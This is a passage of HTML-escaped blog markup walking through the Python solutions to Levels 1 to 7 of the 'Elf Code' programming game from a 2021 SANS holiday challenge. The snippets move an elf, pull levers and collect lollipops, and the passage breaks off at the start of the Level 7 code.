&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 1 solution. The elf goes to the lollipop, then to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_1_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-2"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id58"&gt;Level 2&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 2. This time, there is a sort of maze that the elf must get through. They can't get directly to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_2.png" /&gt;
&lt;p&gt;Now, there are obstacles in the way, forming some sort of maze. Luckily, the
lollipops are placed in such a way, that we can use &lt;code&gt;elf.moveTo&lt;/code&gt; to get
to both of them before going to the castle gate.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 2 solution. The elf goes through the maze, picking lollipops on their way, and arrives at the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_2_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-3"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id59"&gt;Level 3&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 3. The setup is similar to level 1, but there is a yeeter in the way, and there are obstacles preventing from going around it. There's a lever that we can activate to disarm the yeeter." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_3.png" /&gt;
&lt;p&gt;This time, we have to activate the lever to disarm the yeeter. If we look at
what data we must send to the lever, the doc tells us that the lever gives us
an integer, and that we must add 2 to this integer and then return it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
&lt;span class="n"&gt;lever0&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;lollipop0&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lever0&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;lever0&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lever0&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lollipop0&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 3 solution. The elf goes over the lever, activates it, which disarms the yeeter, picks up the lollipop, and goes to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_3_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-4"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id60"&gt;Level 4&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 4. There is an alley of levers, going down from 4 to 0. Right before the castle gate, there is a yeeter. Lollipops stand between each lever. There's no way around." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_4.png" /&gt;
&lt;p&gt;This time, we have to activate five levers to disarm the yeeter. By reading the
doc, we know that:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Lever #0 wants any dictionary object&lt;/li&gt;
&lt;li&gt;Lever #1 wants any list object&lt;/li&gt;
&lt;li&gt;Lever #2 wants any integer&lt;/li&gt;
&lt;li&gt;Lever #3 wants any boolean value&lt;/li&gt;
&lt;li&gt;Lever #4 wants any string&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can create an list of answers, indexed by the lever id. Then, we go to each
lever, down from #4 to #0, and send them the answer they want:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;

&lt;span class="n"&gt;answers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="mi"&gt;1337&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;w00t&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;answers&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 4 solution. The elf goes from lever to lever, activating them all, picking lollipops on the way, until lever #0 where the yeeter is disarmed. The elf then gets to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_4_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-5"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id61"&gt;Level 5&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 5. The setup is the same as level 4." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_5.png" /&gt;
&lt;p&gt;Alright, the setup is the same as the previous level, but now the doc tells us
that:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Lever #0 will give us a dictionary, to which we must add the
&lt;code&gt;&amp;quot;strkey&amp;quot;:&amp;quot;strvalue&amp;quot;&lt;/code&gt; key/value pair.&lt;/li&gt;
&lt;li&gt;Lever #1 will give us a list to which we must append the integer 1.&lt;/li&gt;
&lt;li&gt;Lever #2 will give us an integer that we must increment by 1.&lt;/li&gt;
&lt;li&gt;Lever #3 will give us a boolean value that we must invert.&lt;/li&gt;
&lt;li&gt;Lever #4 will give us a string that must concatenate with string
:code:` concatenante`.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can take the same approach as with level 4, but this time we create a list
of lambda functions that we can call with the data sent by each lever.&lt;/p&gt;
&lt;p&gt;They're all pretty straightforward, except lever 0. I did not find an easy way
to append data to a dictionary. I first tried using &lt;code&gt;{**d,
'strkey':'strvalue'}&lt;/code&gt;. It did work in my Python console, but was not accepted
by the level. I then tried using &lt;code&gt;dict(**d, strkey='strvalue')&lt;/code&gt;. That
was accepted by the level, but the new key/value pair was added at the
&amp;quot;beginning&amp;quot; of the dictionary, whereas it should be added at the &amp;quot;end&amp;quot;. Python
dictionaries are not ordered so I don't know why the level was complaining.&lt;/p&gt;
&lt;p&gt;Anyway, I used this dirty hack where I create a tuple. In the first part of
the tuple, I call &lt;code&gt;d.update&lt;/code&gt;. This will add the desired key/value pair,
but returns nothing, since it updates the dictionary in place. In the second
part of the tuple, I put my updated dictionary &lt;code&gt;d&lt;/code&gt;. I then get the second
part of the tuple by accessing index 1, which will give me my updated
dictionary. It's dirty, but it works.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;

&lt;span class="n"&gt;answers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;d&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;d&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;update&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;strkey&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;strvalue&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;}),&lt;/span&gt; &lt;span class="n"&gt;d&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;l&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;l&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; concatenate&amp;#39;&lt;/span&gt;
&lt;span class="p"&gt;]&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;answer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;answers&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
    &lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;answer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 5 solution. The elf goes from lever to lever, activating them all, picking lollipops on the way, until lever #0 where the yeeter is disarmed. The elf then gets to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_5_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-6"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id62"&gt;Level 6&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 6. There is only one lever and one yeeter, straight between the elf and the castle gate, but still no way around them." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_6.png" /&gt;
&lt;p&gt;This time, there's only one lever. According to the level doc, the lever can
give us different types of data:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;If it gives us a boolean, we must invert it.&lt;/li&gt;
&lt;li&gt;If it gives us an integer, we must double it.&lt;/li&gt;
&lt;li&gt;If it gives us a list, this will be a list of integers: we must return a list
with each integer incremented by 1.&lt;/li&gt;
&lt;li&gt;If it gives us a string, we must concatenate it with itself.&lt;/li&gt;
&lt;li&gt;If it gives us a dictionary, we must increment the value of key &lt;code&gt;a&lt;/code&gt; by
1.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
&lt;span class="n"&gt;lever&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lever&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;
&lt;span class="k"&gt;elif&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;
&lt;span class="k"&gt;elif&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="k"&gt;elif&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;
&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;a&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lever&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;position&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;lever&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;moveUp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="Elf Code Level 6 solution. The elf goes up to the lever, activates it, which disarms the yeeter. They can then go up to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_6_w00t.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="level-7"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id63"&gt;Level 7&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 7. In this level, there is a maze of obstacles, where the elf must go up, then down, then up, then down, then finally up to the castle gate." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_7.png" /&gt;
&lt;p&gt;This time, our little elf must wind through the maze, until they finally get to
the castle gate. We can use a &lt;code&gt;foor&lt;/code&gt; loop, and checking if we're in an
even or odd loop to see if we must go up or down.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
